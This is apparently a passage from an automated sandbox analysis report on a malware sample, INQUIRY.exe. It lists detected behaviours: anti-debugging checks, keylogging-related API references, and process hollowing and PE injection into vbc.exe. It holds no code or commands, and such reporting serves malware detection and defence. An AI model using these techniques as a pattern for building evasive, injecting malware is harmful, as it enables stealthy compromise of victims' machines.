                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048B6F3
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,6_2_00408836
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,6_2_00408836
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_004414DC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_004414DC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048F412 mov eax, dword ptr fs:[00000030h]1_2_0048F412
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048F4D0 mov eax, dword ptr fs:[00000030h]1_2_0048F4D0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048F412 mov eax, dword ptr fs:[00000030h]1_2_0048F412
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048F4D0 mov eax, dword ptr fs:[00000030h]1_2_0048F4D0
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048B6F3
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048A746 SetUnhandledExceptionFilter,1_2_0048A746
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048BBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048BBB5
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048DD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0048DD7F
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048B6F3
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048A746 SetUnhandledExceptionFilter,1_2_0048A746
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048BBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048BBB5
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048DD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0048DD7F
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory protected: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory protected: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    .NET source code references suspicious native API functionsShow sources
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Allocates memory in foreign processesShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Maps a DLL or memory area into another processShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Sample uses process hollowing techniqueShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Writes to foreign memory regionsShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
